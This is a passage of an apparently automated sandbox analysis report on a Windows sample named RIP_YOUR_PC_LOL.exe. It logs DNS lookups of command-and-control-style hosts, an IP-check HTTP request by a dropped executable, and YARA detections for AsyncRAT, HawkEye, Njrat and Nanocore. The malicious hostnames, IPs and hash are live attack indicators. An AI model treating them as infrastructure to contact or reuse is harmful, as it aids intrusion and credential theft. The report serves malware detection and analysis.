                                                                                                        Mar 8, 2022 18:02:52.879266024 CET5269853192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:52.967892885 CET53526988.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:53.016813040 CET5382953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:53.099018097 CET53538298.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:53.111742973 CET6190153192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:53.208043098 CET53619018.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:53.250925064 CET5868953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:53.341078997 CET53586898.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:53.351939917 CET5008153192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:53.688494921 CET53500818.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:54.809392929 CET4952053192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:54.902901888 CET6552653192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:55.664746046 CET5304953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:55.684472084 CET53530498.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:55.762953997 CET5296553192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:55.834017038 CET53529658.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:55.837884903 CET5212553192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:55.930027962 CET5508353192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:55.939817905 CET53521258.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:56.227159977 CET53550838.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:56.465817928 CET5836053192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:56.485572100 CET53583608.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:56.742223978 CET5607153192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:57.091926098 CET53560718.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:02:58.431301117 CET5910653192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:02:58.743158102 CET53591068.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:00.852693081 CET6111353192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:00.870723009 CET53611138.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:03.026786089 CET6065853192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:03.046681881 CET53606588.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:05.181277037 CET6023853192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:05.199376106 CET53602388.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:07.321696043 CET6536753192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:07.343290091 CET53653678.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:09.462516069 CET6115253192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:09.787642956 CET53611528.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:11.455007076 CET6454453192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:11.490103006 CET53645448.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:11.667885065 CET4967953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:11.689558983 CET53496798.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:11.855283022 CET6036153192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:11.875169992 CET53603618.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:13.742429972 CET6377153192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:13.761302948 CET53637718.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:13.962951899 CET6457953192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:13.984797001 CET53645798.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:16.135138988 CET5880153192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:16.157701969 CET53588018.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:18.356760979 CET6157153192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:18.376470089 CET53615718.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:20.463649035 CET4946353192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:20.481589079 CET53494638.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:21.935733080 CET5222553192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:22.042737007 CET53522258.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:23.130189896 CET5534253192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:23.148067951 CET53553428.8.8.8192.168.2.6
                                                                                                        Mar 8, 2022 18:03:23.273044109 CET4975453192.168.2.68.8.8.8
                                                                                                        Mar 8, 2022 18:03:23.588294983 CET53497548.8.8.8192.168.2.6

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                        Mar 8, 2022 18:00:25.222332954 CET192.168.2.68.8.8.80x72edStandard query (0)store-images.s-microsoft.comA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:02.421529055 CET192.168.2.68.8.8.80xf287Standard query (0)gfhhjgh.duckdns.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:21.131813049 CET192.168.2.68.8.8.80x6641Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:29.731457949 CET192.168.2.68.8.8.80xd006Standard query (0)gfhhjgh.duckdns.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:52.253196955 CET192.168.2.68.8.8.80xa2dStandard query (0)kazya1.hopto.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:56.196608067 CET192.168.2.68.8.8.80xf35bStandard query (0)gfhhjgh.duckdns.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:29.062084913 CET192.168.2.68.8.8.80xb207Standard query (0)gfhhjgh.duckdns.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:48.149482012 CET192.168.2.68.8.8.80x541dStandard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:48.414717913 CET192.168.2.68.8.8.80x771cStandard query (0)kazya1.hopto.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:48.427118063 CET192.168.2.68.8.8.80x1458Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:48.514926910 CET192.168.2.68.8.8.80x249fStandard query (0)yabynennet.xyzA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:49.711517096 CET192.168.2.68.8.8.80x1de0Standard query (0)123.105.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:50.793032885 CET192.168.2.68.8.8.80x2cStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:50.939651012 CET192.168.2.68.8.8.80x1b81Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:51.056174994 CET192.168.2.68.8.8.80xa95eStandard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:52.364578009 CET192.168.2.68.8.8.80x658bStandard query (0)prepepe.ac.ugA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:52.476210117 CET192.168.2.68.8.8.80xb173Standard query (0)prepepe.ac.ugA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:52.577049971 CET192.168.2.68.8.8.80xc570Standard query (0)prepepe.ac.ugA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:52.879266024 CET192.168.2.68.8.8.80x28dfStandard query (0)prepepe.ac.ugA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:53.016813040 CET192.168.2.68.8.8.80x7f0cStandard query (0)prepepe.ac.ugA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:53.111742973 CET192.168.2.68.8.8.80x73f9Standard query (0)prepepe.ac.ugA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:53.250925064 CET192.168.2.68.8.8.80x59e3Standard query (0)prepepe.ac.ugA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:53.351939917 CET192.168.2.68.8.8.80x1e6Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:54.809392929 CET192.168.2.68.8.8.80x5dd4Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:54.902901888 CET192.168.2.68.8.8.80x4a0cStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:55.664746046 CET192.168.2.68.8.8.80xd501Standard query (0)gfhhjgh.duckdns.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:55.762953997 CET192.168.2.68.8.8.80x259dStandard query (0)pretorian.ac.ugA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:55.837884903 CET192.168.2.68.8.8.80x66daStandard query (0)pretorian.ac.ugA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:55.930027962 CET192.168.2.68.8.8.80x349dStandard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:56.465817928 CET192.168.2.68.8.8.80xa4a5Standard query (0)22ssh.comA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:56.742223978 CET192.168.2.68.8.8.80xeaaStandard query (0)pool.usa-138.comA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:58.431301117 CET192.168.2.68.8.8.80x8329Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:00.852693081 CET192.168.2.68.8.8.80x4b12Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:03.026786089 CET192.168.2.68.8.8.80x131bStandard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:05.181277037 CET192.168.2.68.8.8.80xff00Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:07.321696043 CET192.168.2.68.8.8.80xd5e2Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:09.462516069 CET192.168.2.68.8.8.80x8118Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:11.455007076 CET192.168.2.68.8.8.80x9cb7Standard query (0)files.000webhost.comA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:11.667885065 CET192.168.2.68.8.8.80x6983Standard query (0)kazya1.hopto.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:11.855283022 CET192.168.2.68.8.8.80x9062Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:13.742429972 CET192.168.2.68.8.8.80x204bStandard query (0)22ssh.comA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:13.962951899 CET192.168.2.68.8.8.80xd1b5Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:16.135138988 CET192.168.2.68.8.8.80xcac2Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:18.356760979 CET192.168.2.68.8.8.80x9ffStandard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:20.463649035 CET192.168.2.68.8.8.80xa314Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:21.935733080 CET192.168.2.68.8.8.80x52d3Standard query (0)gfhhjgh.duckdns.orgA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:23.130189896 CET192.168.2.68.8.8.80xecc7Standard query (0)hackerinvasion.f3322.netA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:23.273044109 CET192.168.2.68.8.8.80xc444Standard query (0)pool.usa-138.comA (IP address)IN (0x0001)

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                        Mar 8, 2022 18:00:25.247078896 CET8.8.8.8192.168.2.60x72edNo error (0)store-images.s-microsoft.comstore-images.s-microsoft.com-c.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:02.530765057 CET8.8.8.8192.168.2.60xf287No error (0)gfhhjgh.duckdns.org179.13.1.253A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:21.159094095 CET8.8.8.8192.168.2.60x6641No error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:21.159094095 CET8.8.8.8192.168.2.60x6641No error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:21.159094095 CET8.8.8.8192.168.2.60x6641No error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:21.159094095 CET8.8.8.8192.168.2.60x6641No error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:21.159094095 CET8.8.8.8192.168.2.60x6641No error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:29.841167927 CET8.8.8.8192.168.2.60xd006No error (0)gfhhjgh.duckdns.org179.13.1.253A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:52.276662111 CET8.8.8.8192.168.2.60xa2dNo error (0)kazya1.hopto.org41.249.51.34A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:01:56.216669083 CET8.8.8.8192.168.2.60xf35bNo error (0)gfhhjgh.duckdns.org179.13.1.253A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:29.169253111 CET8.8.8.8192.168.2.60xb207No error (0)gfhhjgh.duckdns.org179.13.1.253A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:48.436398029 CET8.8.8.8192.168.2.60x771cNo error (0)kazya1.hopto.org41.249.51.34A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:48.491530895 CET8.8.8.8192.168.2.60x541dNo error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:48.538808107 CET8.8.8.8192.168.2.60x249fNo error (0)yabynennet.xyz45.129.99.212A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:48.738595963 CET8.8.8.8192.168.2.60x1458No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:49.731496096 CET8.8.8.8192.168.2.60x1de0Name error (3)123.105.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:50.815732956 CET8.8.8.8192.168.2.60x2cNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:50.815732956 CET8.8.8.8192.168.2.60x2cNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:50.959239960 CET8.8.8.8192.168.2.60x1b81No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:50.959239960 CET8.8.8.8192.168.2.60x1b81No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:51.073822021 CET8.8.8.8192.168.2.60xa95eNo error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:52.455807924 CET8.8.8.8192.168.2.60x658bServer failure (2)prepepe.ac.ugnonenoneA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:52.546967030 CET8.8.8.8192.168.2.60xb173Server failure (2)prepepe.ac.ugnonenoneA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:52.664900064 CET8.8.8.8192.168.2.60xc570Server failure (2)prepepe.ac.ugnonenoneA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:52.967892885 CET8.8.8.8192.168.2.60x28dfServer failure (2)prepepe.ac.ugnonenoneA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:53.099018097 CET8.8.8.8192.168.2.60x7f0cServer failure (2)prepepe.ac.ugnonenoneA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:53.208043098 CET8.8.8.8192.168.2.60x73f9Server failure (2)prepepe.ac.ugnonenoneA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:53.341078997 CET8.8.8.8192.168.2.60x59e3Server failure (2)prepepe.ac.ugnonenoneA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:53.688494921 CET8.8.8.8192.168.2.60x1e6No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:54.832865000 CET8.8.8.8192.168.2.60x5dd4No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:54.924410105 CET8.8.8.8192.168.2.60x4a0cNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:55.684472084 CET8.8.8.8192.168.2.60xd501No error (0)gfhhjgh.duckdns.org179.13.1.253A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:55.834017038 CET8.8.8.8192.168.2.60x259dServer failure (2)pretorian.ac.ugnonenoneA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:55.903019905 CET8.8.8.8192.168.2.60x3236No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:55.939817905 CET8.8.8.8192.168.2.60x66daServer failure (2)pretorian.ac.ugnonenoneA (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:56.227159977 CET8.8.8.8192.168.2.60x349dNo error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:57.091926098 CET8.8.8.8192.168.2.60xeaaNo error (0)pool.usa-138.com220.86.85.75A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:02:58.743158102 CET8.8.8.8192.168.2.60x8329No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:00.870723009 CET8.8.8.8192.168.2.60x4b12No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:03.046681881 CET8.8.8.8192.168.2.60x131bNo error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:05.199376106 CET8.8.8.8192.168.2.60xff00No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:07.343290091 CET8.8.8.8192.168.2.60xd5e2No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:09.787642956 CET8.8.8.8192.168.2.60x8118No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:11.490103006 CET8.8.8.8192.168.2.60x9cb7No error (0)files.000webhost.comus-east-1.route-1000.000webhost.awex.ioCNAME (Canonical name)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:11.490103006 CET8.8.8.8192.168.2.60x9cb7No error (0)us-east-1.route-1000.000webhost.awex.io145.14.144.149A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:11.689558983 CET8.8.8.8192.168.2.60x6983No error (0)kazya1.hopto.org41.249.51.34A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:11.875169992 CET8.8.8.8192.168.2.60x9062No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:13.984797001 CET8.8.8.8192.168.2.60xd1b5No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:16.157701969 CET8.8.8.8192.168.2.60xcac2No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:18.376470089 CET8.8.8.8192.168.2.60x9ffNo error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:20.481589079 CET8.8.8.8192.168.2.60xa314No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:22.042737007 CET8.8.8.8192.168.2.60x52d3No error (0)gfhhjgh.duckdns.org179.13.1.253A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:23.148067951 CET8.8.8.8192.168.2.60xecc7No error (0)hackerinvasion.f3322.net127.0.0.1A (IP address)IN (0x0001)
                                                                                                        Mar 8, 2022 18:03:23.588294983 CET8.8.8.8192.168.2.60xc444No error (0)pool.usa-138.com220.86.85.75A (IP address)IN (0x0001)

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • api.ipify.org

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.64977052.20.78.24080C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Mar 8, 2022 18:01:21.456914902 CET1230OUTGET /?format=xml HTTP/1.1
                                                                                                        Accept: */*
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                        Host: api.ipify.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Mar 8, 2022 18:01:21.597302914 CET1230INHTTP/1.1 200 OK
                                                                                                        Server: Cowboy
                                                                                                        Connection: keep-alive
                                                                                                        Content-Type: text/plain
                                                                                                        Vary: Origin
                                                                                                        Date: Tue, 08 Mar 2022 17:01:21 GMT
                                                                                                        Content-Length: 10
                                                                                                        Via: 1.1 vegur
                                                                                                        Data Raw: 38 34 2e 31 37 2e 35 32 2e 37
                                                                                                        Data Ascii: 84.17.52.7


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:18:00:31
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe"
                                                                                                        Imagebase:0x9f0000
                                                                                                        File size:23633920 bytes
                                                                                                        MD5 hash:52867174362410D63215D78E708103EA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.386628983.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
